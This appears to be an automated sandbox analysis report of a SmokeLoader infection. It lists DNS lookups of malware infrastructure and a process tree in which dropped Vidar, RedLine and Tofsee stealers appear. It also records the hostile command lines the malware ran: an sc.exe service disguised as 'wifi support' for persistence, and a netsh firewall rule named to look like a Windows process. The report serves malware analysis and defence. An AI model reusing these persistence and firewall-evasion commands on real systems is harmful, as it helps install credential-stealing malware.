                                                                                                                                                                                                        Jan 14, 2022 00:15:49.610033989 CET8.8.8.8192.168.2.40x9b8No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.790723085 CET8.8.8.8192.168.2.40xe42dNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.081588984 CET8.8.8.8192.168.2.40x1ab9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.252104998 CET8.8.8.8192.168.2.40xbd50No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.413388014 CET8.8.8.8192.168.2.40x96b5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.582348108 CET8.8.8.8192.168.2.40xdc5dNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.770617008 CET8.8.8.8192.168.2.40x9e07No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.936686993 CET8.8.8.8192.168.2.40xee49No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:51.145322084 CET8.8.8.8192.168.2.40x2ddaNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.314858913 CET8.8.8.8192.168.2.40x10d7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.472961903 CET8.8.8.8192.168.2.40x9efdNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.635926008 CET8.8.8.8192.168.2.40x8aedNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.635926008 CET8.8.8.8192.168.2.40x8aedNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.045312881 CET8.8.8.8192.168.2.40xc7d7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.225570917 CET8.8.8.8192.168.2.40x4298No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.442231894 CET8.8.8.8192.168.2.40x29f3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.600402117 CET8.8.8.8192.168.2.40xc73aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.764776945 CET8.8.8.8192.168.2.40x31e0No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.934189081 CET8.8.8.8192.168.2.40x9952No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:57.123147011 CET8.8.8.8192.168.2.40xf2cNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.375186920 CET8.8.8.8192.168.2.40x5dfaNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.541596889 CET8.8.8.8192.168.2.40x51daNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.774959087 CET8.8.8.8192.168.2.40x9907No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.064773083 CET8.8.8.8192.168.2.40x5b1bNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.243716002 CET8.8.8.8192.168.2.40xd305No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.410080910 CET8.8.8.8192.168.2.40x48a5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.609232903 CET8.8.8.8192.168.2.40x6886No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.845551968 CET8.8.8.8192.168.2.40x7dc1No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.037575960 CET8.8.8.8192.168.2.40xcdf3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.209789038 CET8.8.8.8192.168.2.40xd2abNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.380450010 CET8.8.8.8192.168.2.40x10e6No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.494786978 CET8.8.8.8192.168.2.40x1d04No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.655414104 CET8.8.8.8192.168.2.40x47a2No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.821372032 CET8.8.8.8192.168.2.40xd460No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.358143091 CET8.8.8.8192.168.2.40xd5ffNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.573673010 CET8.8.8.8192.168.2.40xb8a9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.859005928 CET8.8.8.8192.168.2.40xa9f5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:09.300795078 CET8.8.8.8192.168.2.40xc4ecNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:11.650517941 CET8.8.8.8192.168.2.40xb620No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.494309902 CET8.8.8.8192.168.2.40x824cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.692929983 CET8.8.8.8192.168.2.40xce37No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.010508060 CET8.8.8.8192.168.2.40xe413No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.304579020 CET8.8.8.8192.168.2.40xb20fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.678030968 CET8.8.8.8192.168.2.40x165No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.515554905 CET8.8.8.8192.168.2.40x185No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.712820053 CET8.8.8.8192.168.2.40x7768No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.225965977 CET8.8.8.8192.168.2.40xcd02No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.818962097 CET8.8.8.8192.168.2.40x670cNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:22.446170092 CET8.8.8.8192.168.2.40xd3feNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)

HTTP Request Dependency Graph


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 00:14:26
Start date: 14/01/2022
Path: C:\Users\user\Desktop\U3E7zMaux2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\U3E7zMaux2.exe"
Imagebase: 0x400000
File size: 294400 bytes
MD5 hash: 8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 00:14:28
Start date: 14/01/2022
Path: C:\Users\user\Desktop\U3E7zMaux2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\U3E7zMaux2.exe"
Imagebase: 0x400000
File size: 294400 bytes
MD5 hash: 8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 00:14:35
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:36
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:56
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:09
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:12
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:12
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:12
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\D984.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\D984.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:301056 bytes
                                                                                                                                                                                                        MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:15
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:16
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                                                                                                                                                                                                        Imagebase:0x1240000
                                                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:16
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:19
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
Imagebase: 0x1240000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:15:20
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\E666.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\E666.exe
Imagebase: 0x400000
File size: 294400 bytes
MD5 hash: 8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 00:15:21
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\7CA1.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7CA1.exe
Imagebase: 0x400000
File size: 327680 bytes
MD5 hash: 3754DB9964B0177B6E905999B6F18FD7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 00:15:23
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\86C4.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\86C4.exe
Imagebase: 0x400000
File size: 313344 bytes
MD5 hash: B11C5DEFDBA76C2B3EE67EE1B474389D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

General

Start time: 00:15:25
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\8EC4.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\8EC4.exe
Imagebase: 0xfa0000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML

General

Start time: 00:15:28
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 00:15:28
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 00:15:29
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 00:15:29
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 00:15:30
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase: 0x150000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 00:15:30
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:30
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:31
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:32
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:32
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" start shayesoq
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:33
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:33
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\shayesoq\lagavljy.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:10543104 bytes
                                                                                                                                                                                                        MD5 hash:7A36C0AD3083A1519CCE3A67BB377D18
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:33
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                                                                                        File size:82944 bytes
                                                                                                                                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:34
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
